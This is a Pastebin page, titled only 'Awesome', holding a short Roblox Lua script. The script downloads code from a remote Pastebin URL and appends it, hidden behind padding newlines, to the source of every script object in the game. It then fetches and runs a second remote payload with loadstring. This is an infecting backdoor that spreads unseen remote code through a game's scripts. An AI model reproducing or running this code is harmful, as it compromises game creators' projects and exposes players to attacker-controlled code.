Advertisement
coderboy

Awesome

Oct 29th, 2018
157
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.38 KB | None | 0 0
  1. spawn(function()
  2. local src = game:GetService("HttpService"):GetAsync("https://pastebin.com/raw/58Enipt9", false)
  3. for i,v in pairs(game:GetDescendants()) do
  4. pcall(function()
  5. v.Source = v.Source .. "\
  6. \
  7. \
  8. \
  9. \
  10. \
  11. " .. src
  12. end)
  13. wait()
  14. end
  15. end)
  16. print("Starting")
  17. loadstring(game:GetService("HttpService"):GetAsync("https://pastebin.com/raw/SYDZNewt", false))()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement